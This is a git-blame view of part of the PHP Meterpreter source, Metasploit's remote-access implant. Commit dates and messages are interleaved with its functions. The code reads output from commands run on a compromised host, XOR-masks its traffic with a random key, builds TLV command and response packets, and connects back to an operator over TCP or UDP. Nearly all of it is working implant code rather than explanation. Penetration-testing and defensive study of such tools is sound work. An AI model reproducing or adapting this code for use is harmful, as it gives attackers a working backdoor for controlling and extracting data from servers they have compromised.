2010-06-02 10:28:39 +02:00
|
|
|
# Read from the channel's stdout
|
|
|
|
function channel_read($chan_id, $len) {
|
2016-01-05 04:27:17 +01:00
|
|
|
$c = &get_channel_by_id($chan_id);
|
2011-06-30 12:28:04 +02:00
|
|
|
if ($c) {
|
|
|
|
# First get any pending unread data from a previous read
|
|
|
|
$ret = substr($c['data'], 0, $len);
|
|
|
|
$c['data'] = substr($c['data'], $len);
|
|
|
|
if (strlen($ret) > 0) { my_print("Had some leftovers: '$ret'"); }
|
|
|
|
|
|
|
|
# Next grab stderr if we have it and it's not the same file descriptor
|
|
|
|
# as stdout.
|
|
|
|
if (strlen($ret) < $len and is_resource($c[2]) and $c[1] != $c[2]) {
|
|
|
|
# Read as much as possible into the channel's data buffer
|
|
|
|
$read = read($c[2]);
|
|
|
|
$c['data'] .= $read;
|
|
|
|
|
|
|
|
# Now slice out however much the client asked for. If there's any
|
|
|
|
# left over, they'll get it next time. If it doesn't add up to
|
|
|
|
# what they requested, oh well, they'll just have to call read
|
|
|
|
# again. Looping until we get the requested number of bytes is
|
|
|
|
# inconsistent with win32 meterpreter and causes the whole php
|
|
|
|
# process to block waiting on input.
|
|
|
|
$bytes_needed = $len - strlen($ret);
|
|
|
|
$ret .= substr($c['data'], 0, $bytes_needed);
|
|
|
|
$c['data'] = substr($c['data'], $bytes_needed);
|
|
|
|
}
|
|
|
|
|
|
|
|
# Then if there's still room, grab stdout
|
|
|
|
if (strlen($ret) < $len and is_resource($c[1])) {
|
|
|
|
# Same as above, but for stdout. This will overwrite a false
|
|
|
|
# return value from reading stderr but the two should generally
|
|
|
|
# EOF at the same time, so it should be fine.
|
|
|
|
$read = read($c[1]);
|
|
|
|
$c['data'] .= $read;
|
|
|
|
$bytes_needed = $len - strlen($ret);
|
|
|
|
$ret .= substr($c['data'], 0, $bytes_needed);
|
|
|
|
$c['data'] = substr($c['data'], $bytes_needed);
|
|
|
|
}
|
|
|
|
|
|
|
|
# In the event of one or the other of the above read()s returning
|
|
|
|
# false, make sure we have sent any pending unread data before saying
|
|
|
|
# EOF by returning false. Note that if they didn't return false, it is
|
|
|
|
# perfectly legitimate to return an empty string which just means
|
|
|
|
# there's no data right now but we haven't hit EOF yet.
|
|
|
|
if (false === $read and empty($ret)) {
|
|
|
|
if (interacting($chan_id)) {
|
|
|
|
handle_dead_resource_channel($c[1]);
|
|
|
|
}
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
return $ret;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
} else {
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2015-12-08 04:42:34 +01:00
|
|
|
function rand_xor_byte() {
|
|
|
|
return chr(mt_rand(1, 255));
|
|
|
|
}
|
|
|
|
|
|
|
|
function rand_xor_key() {
|
|
|
|
return rand_xor_byte() . rand_xor_byte() . rand_xor_byte() . rand_xor_byte();
|
|
|
|
}
|
|
|
|
|
|
|
|
function xor_bytes($key, $data) {
|
|
|
|
$result = '';
|
|
|
|
|
|
|
|
for ($i = 0; $i < strlen($data); ++$i) {
|
|
|
|
$result .= $data{$i} ^ $key{$i % 4};
|
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
2015-12-08 04:42:34 +01:00
|
|
|
return $result;
|
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
# TLV Helper Functions
|
|
|
|
##
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
function generate_req_id() {
|
|
|
|
$characters = 'abcdefghijklmnopqrstuvwxyz';
|
|
|
|
$rid = '';
|
|
|
|
|
|
|
|
for ($p = 0; $p < 32; $p++) {
|
2011-02-18 01:24:18 +01:00
|
|
|
$rid .= $characters[rand(0, strlen($characters)-1)];
|
2010-07-14 00:51:15 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
return $rid;
|
|
|
|
}
|
|
|
|
|
2015-12-08 04:42:34 +01:00
|
|
|
function write_tlv_to_socket($resource, $raw) {
|
|
|
|
$xor = rand_xor_key();
|
2017-06-26 08:48:01 +02:00
|
|
|
# default to unecrypted traffic
|
|
|
|
$raw = $GLOBALS['SESSION_GUID'] . "\x00" . $raw;
|
|
|
|
write($resource, $xor . xor_bytes($xor, $raw));
|
2015-12-08 04:42:34 +01:00
|
|
|
}
|
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
function handle_dead_resource_channel($resource) {
|
2011-02-18 01:24:18 +01:00
|
|
|
global $msgsock;
|
|
|
|
|
|
|
|
if (!is_resource($resource)) {
|
|
|
|
return;
|
|
|
|
}
|
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
$cid = get_channel_id_from_resource($resource);
|
2011-02-18 01:24:18 +01:00
|
|
|
if ($cid === false) {
|
|
|
|
my_print("Resource has no channel: {$resource}");
|
2010-06-04 04:43:17 +02:00
|
|
|
|
2011-02-18 01:24:18 +01:00
|
|
|
# Make sure the provided resource gets closed regardless of it's status
|
|
|
|
# as a channel
|
2013-04-26 22:12:37 +02:00
|
|
|
remove_reader($resource);
|
2011-02-18 01:24:18 +01:00
|
|
|
close($resource);
|
|
|
|
} else {
|
|
|
|
my_print("Handling dead resource: {$resource}, for channel: {$cid}");
|
2011-06-30 12:28:04 +02:00
|
|
|
|
2011-02-18 01:24:18 +01:00
|
|
|
# Make sure we close other handles associated with this channel as well
|
|
|
|
channel_close_handles($cid);
|
2010-06-04 04:43:17 +02:00
|
|
|
|
2011-06-30 12:28:04 +02:00
|
|
|
# Notify the client that this channel is dead
|
2011-02-18 01:24:18 +01:00
|
|
|
$pkt = pack("N", PACKET_TYPE_REQUEST);
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close'));
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
|
2016-10-29 04:42:36 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, $GLOBALS['UUID']));
|
2016-10-14 03:58:49 +02:00
|
|
|
|
2011-02-18 01:24:18 +01:00
|
|
|
# Add the length to the beginning of the packet
|
|
|
|
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
|
2015-12-08 04:42:34 +01:00
|
|
|
write_tlv_to_socket($msgsock, $pkt);
|
2011-02-18 01:24:18 +01:00
|
|
|
}
|
2010-06-04 04:43:17 +02:00
|
|
|
}
|
2011-02-18 01:24:18 +01:00
|
|
|
|
2010-06-13 18:44:22 +02:00
|
|
|
function handle_resource_read_channel($resource, $data) {
|
2010-07-14 00:51:15 +02:00
|
|
|
global $udp_host_map;
|
2010-06-13 18:44:22 +02:00
|
|
|
$cid = get_channel_id_from_resource($resource);
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("Handling data from $resource");
|
2010-06-04 04:43:17 +02:00
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# Build a new Packet
|
|
|
|
$pkt = pack("N", PACKET_TYPE_REQUEST);
|
2010-06-04 04:43:17 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write'));
|
2010-07-14 00:51:15 +02:00
|
|
|
if (array_key_exists((int)$resource, $udp_host_map)) {
|
|
|
|
list($h,$p) = $udp_host_map[(int)$resource];
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h));
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_PORT, $p));
|
|
|
|
}
|
2010-06-04 04:43:17 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, strlen($data)));
|
2011-02-18 01:24:18 +01:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
|
2016-10-29 04:42:36 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, $GLOBALS['UUID']));
|
2016-10-14 03:58:49 +02:00
|
|
|
|
2010-06-04 04:43:17 +02:00
|
|
|
# Add the length to the beginning of the packet
|
|
|
|
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
|
|
|
|
return $pkt;
|
|
|
|
}
|
|
|
|
|
2017-06-26 08:48:01 +02:00
|
|
|
function create_response($req) {
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$pkt = pack("N", PACKET_TYPE_RESPONSE);
|
|
|
|
|
|
|
|
$method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD);
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("method is {$method_tlv['value']}");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
packet_add_tlv($pkt, $method_tlv);
|
|
|
|
|
|
|
|
$reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID);
|
|
|
|
packet_add_tlv($pkt, $reqid_tlv);
|
|
|
|
|
|
|
|
if (is_callable($method_tlv['value'])) {
|
|
|
|
$result = $method_tlv['value']($req, $pkt);
|
|
|
|
} else {
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$result = ERROR_FAILURE;
|
|
|
|
}
|
|
|
|
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_RESULT, $result));
|
2016-10-29 04:42:36 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, $GLOBALS['UUID']));
|
2016-10-14 03:58:49 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
# Add the length to the beginning of the packet
|
|
|
|
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
|
|
|
|
return $pkt;
|
|
|
|
}
|
|
|
|
|
|
|
|
function create_tlv($type, $val) {
|
|
|
|
return array( 'type' => $type, 'value' => $val );
|
|
|
|
}
|
|
|
|
|
|
|
|
function tlv_pack($tlv) {
|
|
|
|
$ret = "";
|
2010-06-03 00:43:03 +02:00
|
|
|
#my_print("Creating a tlv of type: {$tlv['type']}");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
|
|
|
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
|
2010-06-04 01:18:21 +02:00
|
|
|
}
|
2014-07-07 11:46:54 +02:00
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
|
|
|
$hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
|
|
|
|
$lo = $tlv['value'] & 0xFFFFFFFF;
|
|
|
|
$ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
|
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
|
|
|
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
|
|
|
|
}
|
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
|
2010-06-04 01:18:21 +02:00
|
|
|
# PHP's pack appears to be busted for chars,
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$ret = pack("NN", 8 + 1, $tlv['type']);
|
|
|
|
$ret .= $tlv['value'] ? "\x01" : "\x00";
|
|
|
|
}
|
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
|
|
|
|
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
|
|
|
|
}
|
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP) {
|
|
|
|
# treat groups the same as raw
|
|
|
|
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
|
2010-06-04 01:18:21 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
elseif (($tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX) {
|
|
|
|
# treat complex the same as raw
|
|
|
|
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
|
2010-06-04 01:18:21 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
else {
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("Don't know how to make a tlv of type ". $tlv['type'] . " (meta type ". sprintf("%08x", $tlv['type'] & TLV_META_TYPE_MASK) ."), wtf");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
|
|
|
return $ret;
|
|
|
|
}
|
|
|
|
|
2013-11-27 06:16:28 +01:00
|
|
|
function tlv_unpack($raw_tlv) {
|
|
|
|
$tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
|
|
|
|
$type = $tlv['type'];
|
|
|
|
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
|
|
|
|
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
|
|
|
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
|
2014-07-03 22:58:05 +02:00
|
|
|
# PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
|
|
|
|
# NULL, so catch that here
|
|
|
|
$tlv['value'] = str_replace("\0", "", $tlv['value']);
|
2013-11-27 06:16:28 +01:00
|
|
|
}
|
|
|
|
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
|
|
|
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
|
|
|
|
}
|
2014-07-07 11:46:54 +02:00
|
|
|
elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
|
|
|
$tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
|
|
|
|
$tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
|
|
|
|
}
|
2013-11-27 06:16:28 +01:00
|
|
|
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
|
|
|
|
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
|
|
|
|
}
|
|
|
|
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
|
|
|
|
$tlv = unpack("Nlen/Ntype", $raw_tlv);
|
|
|
|
$tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
my_print("Wtf type is this? $type");
|
|
|
|
$tlv = null;
|
|
|
|
}
|
|
|
|
return $tlv;
|
|
|
|
}
|
|
|
|
|
2010-06-04 01:18:21 +02:00
|
|
|
function packet_add_tlv(&$pkt, $tlv) {
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$pkt .= tlv_pack($tlv);
|
|
|
|
}
|
|
|
|
|
|
|
|
function packet_get_tlv($pkt, $type) {
|
2010-06-13 18:44:22 +02:00
|
|
|
#my_print("Looking for a tlv of type $type");
|
2010-06-03 06:45:48 +02:00
|
|
|
# Start at offset 8 to skip past the packet header
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$offset = 8;
|
|
|
|
while ($offset < strlen($pkt)) {
|
2013-11-27 06:16:28 +01:00
|
|
|
$tlv = tlv_unpack(substr($pkt, $offset));
|
2010-06-03 00:43:03 +02:00
|
|
|
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
|
2010-06-15 19:55:37 +02:00
|
|
|
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
|
2010-06-03 00:43:03 +02:00
|
|
|
#my_print("Found one at offset $offset");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
return $tlv;
|
|
|
|
}
|
|
|
|
$offset += $tlv['len'];
|
|
|
|
}
|
2010-06-13 18:44:22 +02:00
|
|
|
#my_print("Didn't find one, wtf");
|
2016-10-14 03:58:49 +02:00
|
|
|
# We should return null instead of false, because false is actually
|
|
|
|
# a valid value for a TLV and hence it's not possible to determine
|
|
|
|
# a missing BOOL tlv value.
|
|
|
|
return null;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
|
2013-11-27 06:16:28 +01:00
|
|
|
function packet_get_all_tlvs($pkt, $type) {
|
|
|
|
my_print("Looking for all tlvs of type $type");
|
|
|
|
# Start at offset 8 to skip past the packet header
|
|
|
|
$offset = 8;
|
|
|
|
$all = array();
|
|
|
|
while ($offset < strlen($pkt)) {
|
|
|
|
$tlv = tlv_unpack(substr($pkt, $offset));
|
|
|
|
if ($tlv == NULL) {
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
|
|
|
|
if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
|
|
|
|
my_print("Found one at offset $offset");
|
|
|
|
array_push($all, $tlv);
|
|
|
|
}
|
|
|
|
$offset += $tlv['len'];
|
|
|
|
}
|
|
|
|
return $all;
|
|
|
|
}
|
|
|
|
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
##
|
|
|
|
# Functions for genericizing the stream/socket conundrum
|
|
|
|
##
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
function register_socket($sock, $ipaddr=null, $port=null) {
|
|
|
|
global $resource_type_map, $udp_host_map;
|
|
|
|
my_print("Registering socket $sock for ($ipaddr:$port)");
|
2010-06-08 09:59:36 +02:00
|
|
|
$resource_type_map[(int)$sock] = 'socket';
|
2010-07-14 00:51:15 +02:00
|
|
|
if ($ipaddr) {
|
|
|
|
$udp_host_map[(int)$sock] = array($ipaddr, $port);
|
|
|
|
#dump_array($udp_host_map, "UDP Map after registering a new socket");
|
|
|
|
}
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# The stream functions cannot be unconnected, so don't require a host map
|
|
|
|
function register_stream($stream, $ipaddr=null, $port=null) {
|
|
|
|
global $resource_type_map, $udp_host_map;
|
|
|
|
my_print("Registering stream $stream for ($ipaddr:$port)");
|
2010-06-08 09:59:36 +02:00
|
|
|
$resource_type_map[(int)$stream] = 'stream';
|
2010-07-14 00:51:15 +02:00
|
|
|
if ($ipaddr) {
|
|
|
|
$udp_host_map[(int)$stream] = array($ipaddr, $port);
|
|
|
|
#dump_array($udp_host_map, "UDP Map after registering a new stream");
|
|
|
|
}
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
function connect($ipaddr, $port, $proto='tcp') {
|
2010-06-25 02:39:48 +02:00
|
|
|
my_print("Doing connect($ipaddr, $port)");
|
|
|
|
$sock = false;
|
2012-01-31 10:42:50 +01:00
|
|
|
|
|
|
|
# IPv6 requires brackets around the address in some cases, but not all.
|
|
|
|
# Keep track of the un-bracketed address for the functions that don't like
|
|
|
|
# brackets, specifically socket_connect and socket_sendto.
|
|
|
|
$ipf = AF_INET;
|
|
|
|
$raw_ip = $ipaddr;
|
|
|
|
if (FALSE !== strpos($ipaddr, ":")) {
|
|
|
|
$ipf = AF_INET6;
|
|
|
|
$ipaddr = "[". $raw_ip ."]";
|
|
|
|
}
|
|
|
|
|
2010-06-25 02:39:48 +02:00
|
|
|
# Prefer the stream versions so we don't have to use both select functions
|
|
|
|
# unnecessarily, but fall back to socket_create if they aren't available.
|
|
|
|
if (is_callable('stream_socket_client')) {
|
2010-07-27 23:16:15 +02:00
|
|
|
my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
|
2010-07-14 00:51:15 +02:00
|
|
|
$sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
|
2010-07-27 23:16:15 +02:00
|
|
|
my_print("Got a sock: $sock");
|
2010-06-25 02:39:48 +02:00
|
|
|
if (!$sock) { return false; }
|
2010-07-14 00:51:15 +02:00
|
|
|
if ($proto == 'tcp') {
|
|
|
|
register_stream($sock);
|
|
|
|
} elseif ($proto == 'udp') {
|
|
|
|
register_stream($sock, $ipaddr, $port);
|
2010-07-27 23:16:15 +02:00
|
|
|
} else {
|
|
|
|
my_print("WTF proto is this: '$proto'");
|
2010-07-14 00:51:15 +02:00
|
|
|
}
|
2010-06-25 02:39:48 +02:00
|
|
|
} else
|
|
|
|
if (is_callable('fsockopen')) {
|
|
|
|
my_print("fsockopen");
|
2010-07-14 00:51:15 +02:00
|
|
|
if ($proto == 'tcp') {
|
|
|
|
$sock = fsockopen($ipaddr,$port);
|
|
|
|
if (!$sock) { return false; }
|
2011-06-30 12:28:04 +02:00
|
|
|
if (is_callable('socket_set_timeout')) {
|
|
|
|
socket_set_timeout($sock, 2);
|
|
|
|
}
|
2010-07-14 00:51:15 +02:00
|
|
|
register_stream($sock);
|
|
|
|
} else {
|
|
|
|
$sock = fsockopen($proto."://".$ipaddr,$port);
|
|
|
|
if (!$sock) { return false; }
|
|
|
|
register_stream($sock, $ipaddr, $port);
|
|
|
|
}
|
2012-01-31 10:42:50 +01:00
|
|
|
} else
|
|
|
|
if (is_callable('socket_create')) {
|
2010-06-25 02:39:48 +02:00
|
|
|
my_print("socket_create");
|
2010-07-14 00:51:15 +02:00
|
|
|
if ($proto == 'tcp') {
|
2012-01-31 10:42:50 +01:00
|
|
|
$sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
|
|
|
|
$res = socket_connect($sock, $raw_ip, $port);
|
2010-07-14 00:51:15 +02:00
|
|
|
if (!$res) { return false; }
|
|
|
|
register_socket($sock);
|
|
|
|
} elseif ($proto == 'udp') {
|
2012-01-31 10:42:50 +01:00
|
|
|
$sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
|
|
|
|
register_socket($sock, $raw_ip, $port);
|
2010-07-14 00:51:15 +02:00
|
|
|
}
|
2010-06-25 02:39:48 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
return $sock;
|
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
function eof($resource) {
|
|
|
|
$ret = false;
|
|
|
|
switch (get_rtype($resource)) {
|
|
|
|
# XXX Doesn't work with sockets.
|
|
|
|
case 'socket': break;
|
2011-06-30 12:28:04 +02:00
|
|
|
case 'stream':
|
|
|
|
# We set the socket timeout for streams opened with fsockopen() when
|
|
|
|
# they are created. I hope this is enough to deal with hangs when
|
|
|
|
# calling feof() on socket streams, but who knows. This is PHP,
|
|
|
|
# anything could happen. Some day they'll probably add a new function
|
|
|
|
# called stream_eof() and it will handle sockets properly except for
|
|
|
|
# some edge case that happens for every socket except the one or two
|
|
|
|
# they tested it on and it will always return false on windows and
|
|
|
|
# later they'll rename it to real_stream_eof_this_language_isretarded().
|
|
|
|
#
|
|
|
|
# See http://us2.php.net/manual/en/function.feof.php , specifically this:
|
|
|
|
# If a connection opened by fsockopen() wasn't closed by the server,
|
2013-04-26 22:12:37 +02:00
|
|
|
# feof() will hang. To workaround this, see below example:
|
2011-06-30 12:28:04 +02:00
|
|
|
# <?php
|
|
|
|
# function safe_feof($fp, &$start = NULL) {
|
|
|
|
# ...
|
|
|
|
$ret = feof($resource);
|
|
|
|
break;
|
2010-07-14 00:51:15 +02:00
|
|
|
}
|
|
|
|
return $ret;
|
|
|
|
}
|
|
|
|
|
2010-06-08 09:59:36 +02:00
|
|
|
function close($resource) {
|
2010-06-13 18:44:22 +02:00
|
|
|
my_print("Closing resource $resource");
|
